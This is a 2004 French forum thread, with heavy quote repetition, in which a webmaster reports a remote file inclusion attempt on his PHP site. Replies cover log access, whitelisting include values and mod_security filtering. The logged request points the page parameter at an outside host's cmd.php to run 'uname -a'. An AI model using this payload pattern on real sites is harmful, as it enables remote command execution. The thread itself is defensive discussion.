Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Pour info, Ovh a été hacké cette semaine (dont le site dont je m'occupe), il a laissé en signature "mirrorteam"
OVH essuie plusieurs (voir plusieurs dizaines) de tentatives sérieuses et/ou réussies de hacking, tous les jours :-)
-- "Never forget: 2 + 2 = 5 for extremely large values of 2"
Gregory Le Bras
On 26 Feb 2004 10:35:40 GMT, VarioFlux wrote:
Par contre, je sais qu'il est venu grace à mon script de tracking, mais comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que chercher ?
Il faut aller voir les faqs OVH : http://www.ovh.com/fr/support/faq/generale/mutualise.html
---- SNIP ----
Pour consulter vos stats, vous devez aller à cette adresse : http://logs.ovh.net/<votre domaine> Utilisez votre nichandle (Admin, tech ou billing) ainsi que son mot de passe pour vous connecter.
On 26 Feb 2004 10:35:40 GMT, VarioFlux <varioflux@free.fr.avirer>
wrote:
Par contre, je sais qu'il est venu grace à mon script de tracking, mais
comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que
chercher ?
Il faut aller voir les faqs OVH :
http://www.ovh.com/fr/support/faq/generale/mutualise.html
---- SNIP ----
Pour consulter vos stats, vous devez aller à cette adresse :
http://logs.ovh.net/<votre domaine>
Utilisez votre nichandle (Admin, tech ou billing) ainsi que son mot de
passe pour vous connecter.
Par contre, je sais qu'il est venu grace à mon script de tracking, mais comment voir les logs, je suis hébergé chez OVH sur un 60gp, et que chercher ?
Il faut aller voir les faqs OVH : http://www.ovh.com/fr/support/faq/generale/mutualise.html
---- SNIP ----
Pour consulter vos stats, vous devez aller à cette adresse : http://logs.ovh.net/<votre domaine> Utilisez votre nichandle (Admin, tech ou billing) ainsi que son mot de passe pour vous connecter.
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Il me semble que cette méthode est fiable, peut-être même plus fiable que celle que j'utilise (si le contenu de la variable ne contient que des lettres, j'ajoute "../repertoire/" devant et ".txt" derrière).
-- ;-)
On 26 Feb 2004 10:35:40 GMT, VarioFlux <varioflux@free.fr.avirer>
wrote:
Je ne pense pas : je récupère le contenu de la variable par $_GET, je
teste par un switch certaines valeurs prédéfinies sinon j'en impose une
par défaut, ça me permet de remplir une valeur numérique et je
déclenche des includes spécifiques par un switch sur la valeur
numérique (qui gère aussi les valeurs et le "par défaut") de pages
internes.
Il me semble que cette méthode est fiable, peut-être même plus fiable
que celle que j'utilise (si le contenu de la variable ne contient que
des lettres, j'ajoute "../repertoire/" devant et ".txt" derrière).
Je ne pense pas : je récupère le contenu de la variable par $_GET, je teste par un switch certaines valeurs prédéfinies sinon j'en impose une par défaut, ça me permet de remplir une valeur numérique et je déclenche des includes spécifiques par un switch sur la valeur numérique (qui gère aussi les valeurs et le "par défaut") de pages internes.
Il me semble que cette méthode est fiable, peut-être même plus fiable que celle que j'utilise (si le contenu de la variable ne contient que des lettres, j'ajoute "../repertoire/" devant et ".txt" derrière).
-- ;-)
Lionel
Thibaut Allender wrote:
non, tu n'as pas compris le principe de l'include
LOL, je viens de relire mon message, je devais être sacrément fatigué hier! bon, ok, ca fait un bail que j'ai plus fait de php mais bon quand meme....
Thibaut Allender wrote:
non, tu n'as pas compris le principe de l'include
LOL, je viens de relire mon message, je devais être sacrément fatigué hier!
bon, ok, ca fait un bail que j'ai plus fait de php mais bon quand meme....
LOL, je viens de relire mon message, je devais être sacrément fatigué hier! bon, ok, ca fait un bail que j'ai plus fait de php mais bon quand meme....
Patrick
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme mod_security
Il n'y avait aucune proposition technique derrière, je m'arrêtais à la théorie, chacun ses choix techniques derrière. Pour ce faire, j'employerais apache direct, y'a une solution déjà integrée.
Cf http://www.modsecurity.org/documentation/overview.html ce n'est pas équivalent (ex: on ne peut pas aisément avec un RewriteRule analyser le contenu d'un POST dans Apache, et dans l'exemple de ce thread, le cmd pourrait être dans le post, et pas dans le get !).
Mais bon, comme toujours, il y a toujours plusieurs solutions, nous sommes d'accord :-)
Patrick.
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est
trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse
suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme
mod_security
Il n'y avait aucune proposition technique derrière, je m'arrêtais à la
théorie, chacun ses choix techniques derrière. Pour ce faire,
j'employerais apache direct, y'a une solution déjà integrée.
Cf http://www.modsecurity.org/documentation/overview.html
ce n'est pas équivalent
(ex: on ne peut pas aisément avec un RewriteRule analyser le contenu d'un
POST dans Apache, et dans l'exemple de ce thread, le cmd pourrait être
dans le post, et pas dans le get !).
Mais bon, comme toujours, il y a toujours plusieurs solutions, nous
sommes d'accord :-)
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Ou installation d'un ``firewall'' applicatif pour Apache, comme mod_security
Il n'y avait aucune proposition technique derrière, je m'arrêtais à la théorie, chacun ses choix techniques derrière. Pour ce faire, j'employerais apache direct, y'a une solution déjà integrée.
Cf http://www.modsecurity.org/documentation/overview.html ce n'est pas équivalent (ex: on ne peut pas aisément avec un RewriteRule analyser le contenu d'un POST dans Apache, et dans l'exemple de ce thread, le cmd pourrait être dans le post, et pas dans le get !).
Mais bon, comme toujours, il y a toujours plusieurs solutions, nous sommes d'accord :-)